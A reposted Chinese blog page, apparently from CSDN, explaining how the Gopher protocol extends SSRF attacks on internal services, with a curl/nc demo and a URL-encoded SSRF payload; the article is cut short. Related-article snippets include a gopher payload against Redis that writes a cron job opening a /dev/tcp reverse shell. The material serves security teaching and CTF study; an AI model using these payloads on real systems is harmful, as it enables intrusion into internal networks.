gopher攻击mysql_[WEB安全] SSRF 利用 Gopher 协议拓展攻击面【转载】

最新推荐文章于 2024-02-06 14:30:00 发布
最新推荐文章于 2024-02-06 14:30:00 发布
阅读量157 收藏
点赞数
文章标签: gopher攻击mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30268555/article/details/114500413
版权

0x01 概述

Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。

gopher协议支持发出 GET、POST 请求:可以先截获 get 请求包和 post 请求包,再构造成符合 gopher 协议的请求。 gopher 协议是 ssrf 利用中一个最强大的协议(俗称万能协议)

Gopher 协议是 HTTP 协议出现之前,在 Internet 上常见且常用的一个协议。在 ssrf 时常常会用到 gopher 协议构造 post 包来攻击内网应用。其实构造方法很简单,与 http 协议很类似。不同的点在于 gopher 协议没有默认端口,所以需要指定 web 端口,而且需要指定 post 方法。回车换行使用 %0d%0a 。注意 post 参数之间的 & 分隔符也要进行 url 编码

基本协议格式:

URL:gopher://:/_TCP数据流

简单举例:

$nc -lvvp 2222

$curl gopher://127.0.0.1:2222/_hello%0agopher

#注意如果在地址栏利用payload时要再进行一次url编码

http://127.0.0.1/ssrf.php?url=gopher://127.0.0.1:2222/_hello%250agopher

dad5142ae2a3e28e2592b0594a6e7498.png

0x02 拓展攻击面

林子诗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 远程攻击_gopher 协议攻击内网 mysql
weixin_29480231的博客
01-19 272
本地测试一开始使用的是 centos 6.5 的虚拟机后来发现我的 curl 为 7.19.7 版本,不支持 gopher 协议但是都失败了..如果有 centos 6.5 升级 curl 版本成功的请告诉我!环境搭建失败了就只能慢慢的搭环境了,一时脑抽想体验一下 docker-compose,就去装了 dnmp(docker+nginx+mysql+php) 很棒的一个项目不过默认 php_cu...
php mysql盲注_[题目]记一次利用gopher的内网mysql盲注
weixin_42560991的博客
01-28 174
进去之后随便输账号密码登陆, 发现是个send.php在url后缀中,疑似文件包含,尝试用phpfilter发现可以任意读取,把源码down下来之后发现是个利用gopherssrf,题目已经提示得很明显了,利用站外location跳转到gopher协议下进行内网操作, 然后还能读到一个sql文件个conn.php,并且数据库无密码.那么应该是操作数据库了, 但是这里有两个问题,1:不知道数据库的...
gopher攻击mysql_CTFweb类型(二十七)gophermysql利用及例题讲解
weixin_42462007的博客
02-05 293
本次来讲一下gopher协议MySQL中的利用,其实CTF题目中已经有出现过了,比如说红帽杯还有CTF都有出现过,不管是像之前讲的Redis还是MySQL,就是这种协议利用,都是有可以做转化,现在我们讲的只是一个demo,毕竟这些协议最终它的本质其实都是对MySQL,对Redis的一个使用,但是应用能够扩展成什么类型的题目,都可以在变。先讲一下对MySQL利用:我这边创建一个demo,简单了...
gophermysql利用_gopher协议攻击利用
weixin_32873435的博客
02-23 200
攻击内网redis攻击redis常见exp为:对应的gopher协议为:gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/172.19.23.2...
gophermysql利用及例题讲解
DKPT的博客
12-06 124
查询语句(url编码)+url编码的登入请求。
GopherServer-master_C#_Gopher_
09-29
Gopher协议Web出现之前非常流行,但现在更多地被视为一种复古或历史的兴趣。 在深入探讨GopherServer-master之前,我们先了解一下Gopher协议的基本概念。Gopher协议通过一个基于菜单的层次结构来组织信息,用户...
flask-gopher:Flask扩展,支持Gopher协议
02-05
扩展以支持协议。 内容 演示版 在以下URL的gopherspace中提供了Flask-Gopher服务器的实时演示: gopher://mozz.us:7005 关于 什么是地鼠? Gopher是万维网的替代方案,后者在90年代初达到顶峰。 狂热者仍然维护...
frog_gopher:一个用于Gopher精彩世界的服务器
05-18
FROG.TIPS GOPHER服务器 _ __,..---""-._ ';-, A GOPHER , _/_),-"` '-. `\\ IS BASICALLY \|.-"` -_) '. || A MOUSE, /` a , \ .'/ RIGHT??? '.___,__/ .-' \_ _.-'.' |\ \ \
Gopher China_2015至2019.zip
08-20
Gopher China 是中国最权威、最实力、最干货的 Go 大会,致力于为中国广大的 Gopher 提供最好的技术交流大会。 自2015年主办以来,连续4年都获得了非常好的口碑,每一年的大会从质到量都有一次新的突破。 2019年第五...
phetch::mouse_face:终端的快速lil gopher客户端
02-06
Phetch以其简洁、高效的TUI(终端用户界面)著称,完全利用了Rust编程语言的性能和安全性。Rust是一种系统级语言,强调内存安全和并发性,因此Phetch能够提供快速的响应和稳定的运行体验。 在Phetch中,用户可以...
gophermysql利用_从一道CTF题目看Gopher攻击MySql
weixin_32394247的博客
02-23 102
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0×00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
gopher攻击mysql_gopher 协议SSRF 中的一些利用
weixin_42131785的博客
02-05 1133
gopher 协议协议简介gopher 协议是一个在http 协议诞生前用来访问Internet 资源的协议可以理解为http 协议的前身或简化版,虽然很古老但现在很多库还支持gopher 协议而且gopher 协议功能很强大。它可以实现多个数据包整合发送,然后gopher 服务器将多个数据包捆绑着发送到客户端,这就是它的菜单响应。比如使用一条gopher 协议的curl 命令就能操作mysql ...
gopher攻击mysql_机窝安全--安全技术 | 巧用Gopher协议扩展SSRF攻击手法
weixin_36001196的博客
02-23 656
SSRF(服务器端请求伪造)漏洞是一种由攻击者构造形成由服务端发起请求的一个安全漏洞,话不多说,看文章。0×01 环境搭建Centos 靶机Kali攻击机Lnmp [文中会介绍安装]Redis[文中会介绍安装]Gopherus.py [https://github.com/tarunkant/Gopherus]目标站点源码1 ...
ssrf漏洞利用(内网探测、打redis)
最新发布
Javachichi的博客
02-06 1736
声明该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。滑至文末,获取“searchall”下载链接!
SSRF利用 Gopher |Gopher攻击mysql及内网
crispr的博客
06-23 5149
SSRF利用 Gopher 0X01 前言 研究了一天Gopher协议的应用,实践之后决定写一下关于Gopher协议SSRF利用的相关总结。 参考链接:https://blog.csdn.net/qq_41107295/article/details/103026470 0X02 概述 SSRF(Server-Side Request Forgery)服务端请求伪造,是一种由攻击者构造形成由...
mysql is fashion ctf_从一道CTF题目看Gopher攻击MySql
weixin_29032337的博客
01-20 197
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0x00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
从一道CTF题目看Gopher攻击MySql(转载)
qwzf
07-18 940
转载自FreeBuf平台 作者:undef1ned 前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0x00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,解压后的目录不解析php。通过上传一个含有符号链接文件的压缩
SSRF漏洞理解进阶&SSRF+gopher打内网(redis、mysql、fastcgi)& SSRF相关基础概念
东隅的博客
10-25 8061
SSRF漏洞理解进阶&SSRF+gopher打内网(redis、mysql、fastcgi)& SSRF相关基础概念。首先要了解几个概念:内网&外网代理curlgopher、ftp、dict伪协议file_get_contents()、 fsockopen() 、curl_exec() 等函数。
SSRF利用 Gopher 协议拓展攻击面
BerL1n
11-25 9782
1 概述 Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面gophergopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是s...
Gopher协议使用总结1
08-03
在技术层面上,Gopher支持GET和POST请求,这使得它能够被用于构造符合Gopher协议的网络请求,进而进行多种类型的内网攻击,如针对FTP、Telnet、Redis、Memcache等服务的渗透,甚至基于TCP包的exploit。Gopher的默认...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值